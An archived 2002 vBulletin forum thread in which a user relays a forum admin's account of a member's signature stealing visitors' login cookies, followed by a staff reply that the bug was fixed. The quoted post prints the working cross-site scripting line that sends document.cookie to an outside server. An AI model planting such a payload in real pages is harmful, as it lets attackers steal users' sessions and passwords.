vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vBulletin Pre-Sales Questions (https://vborg.vbsupport.ru/forumdisplay.php?f=26)
-   -   vbulletin easy to hack? (https://vborg.vbsupport.ru/showthread.php?t=39014)

rijko412 05-24-2002 08:10 PM
vbulletin easy to hack?
 
Quote:
I've identified the culprit, and sorry mate I'm not doing you any more favours. My personal opinion is that xxxxx was the one responsible (aka xxxxx if you don't know which one I'm on about). The reason being this little bumnugget in his sig:

<script>document.write('<img src="http://www.inforaa.net/cgi/news.pl&a='+document.cookie+'">')</script>

Basically this is a password stealer. It generates an image tag, with your user id and cookie-encrypted password tacked on the end of the URL. It points to his server. If you've ever viewed his sig, he's got your password. (or an encrypted form, but that can still be used to gain access to any vBulletin account you might have, possibly other forums systems if they also use MD5 password cookies) xxxx admits this but claims that he was the only one who saw the passwords and did not use them to attack xxxx. My experience suggests otherwise (and I shall go into more detail later) but even if these passwords weren't used in the attack, he was still stealing passwords (which he seems to think is okay), so he's now banned.
this is what happened at my friends forum. i think this is something that had to be said.

Steve Machol 05-25-2002 03:42 AM
This bug was fixed several versions ago. You should tell your friend to read the announcements regarding vB and upgrade whenever there's a security fix.


All times are GMT. The time now is 03:23 PM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.00942 seconds
  • Memory Usage 1,711KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (2)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete